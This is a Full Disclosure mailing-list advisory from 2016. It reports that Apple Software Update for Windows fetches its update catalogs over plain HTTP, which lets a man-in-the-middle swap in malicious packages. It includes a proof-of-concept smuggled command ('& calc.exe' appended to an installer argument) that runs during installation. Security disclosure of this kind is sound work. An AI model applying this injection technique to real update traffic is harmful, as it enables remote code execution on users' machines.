Full Disclosure mailing list archives

By Date By Thread Apple Software Update 2.1.3 (Windows) Remote Command Execution. From: Rio Sherri <rio.sherri () fshnstudent info>

Date: Fri, 29 Jan 2016 20:39:40 +0100

Apple software update is an utility to update apple software on windows machines. The update proccess uses this kind of architecture. First the software makes a request to http://swcatalog.apple.com/content/catalogs/others/index-windows-1.sucatalog This returns a xml file containing url of ".dist" files, and there were some more interesting things key>Packages</key> <array> <dict> <key>URL</key> <string> http://swcdn.apple.com/content/downloads/61/34/061-8153/WgWXrHyJVmFn9KrXRg3w2XPXNFXxhnZFS6/BootCampUpdate32.msp </string> . . . . MSP is a file extension for a Windows Installer patch file format used by Windows and Microsoft programs, typically for bug fixes, security updates and hotfixes. Since the program connects with the host in plain text http we can use a MITM attack and modify the response and the link to a malicous .msp and we get a remote command execution. There are even .exe files . . . <key>URL</key> string> http://swcdn.apple.com/content/downloads/21/23/061-4512/BKYTZyKmtNr5wpxQCTy9f8xDSYPZ5MTGf4/BCLocUpdateEnable.exe </string> . . . Apart from this if we take a look at the .dist file the program uses XML files. It has options for urls,arch, etc etc An example: http://swcdn.apple.com/content/downloads/42/17/031-43074/ts4e9jo3pe732xq8ghsq504uye3x1dt7az/031-43074.English.dist Has the following content <?xml version="1.0" encoding="utf-8" standalone="yes"?> <installer-gui-script minSpecVersion='1'> <platforms> <Windows arch="intel"/> </platforms> <choices-outline ui='SoftwareUpdate'> <line choice='su'/> </choices-outline> <choice id='su'> <pkg-ref id='auto' onConclusion='RequireRestart'>BootCampUpdate32.msp</pkg-ref> </choice> . . . . . It has a "rtf" file content which is runned when the installation begins.(Which can lead to exploitation of Word Bugs) It has a html file content which is runned through IE Scripting Engine(Which can lead to exploitation of Internet Explorer Bugs) The other intersting thing is <choice id='su' suDisabledGroupID='QuickTime' selected='!IsNewSoftware()'> <pkg-ref id='com.apple.swu.AppleApplicationSupport' arguments='PARENTUILVL=2' version='2.3.0' enabled='InstallAAS()'>AppleApplicationSupport.msi</pkg-ref> <pkg-ref id='com.apple.swu.QuickTime' enabled='!IsNewSoftware()'>QuickTime.msi</pkg-ref> <pkg-ref id='com.apple.swu.QuickTimeN' enabled='IsNewSoftware()' arguments='DESKTOP_SHORTCUTS=1'>QuickTime.msi</pkg-ref> <pkg-ref id='com.apple.swu.QuickTimeInstallerAdmin'>QuickTimeInstallerAdmin.exe</pkg-ref> </choice> Basically this are the commands that get executed throughout installation. So modifying this response through a MITM, adding an argument as below From: <pkg-ref id='com.apple.swu.QuickTimeN' enabled='IsNewSoftware()' arguments='DESKTOP_SHORTCUTS=1'>QuickTime.msi</pkg-ref> To: <pkg-ref id='com.apple.swu.QuickTimeN' enabled='IsNewSoftware()' arguments='DESKTOP_SHORTCUTS=1 & calc.exe'>QuickTime.msi</pkg-ref> Our command executes. Rio Sherri Infogen AL _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/ By Date By Thread Current thread: Apple Software Update 2.1.3 (Windows) Remote Command Execution. Rio Sherri (Feb 03)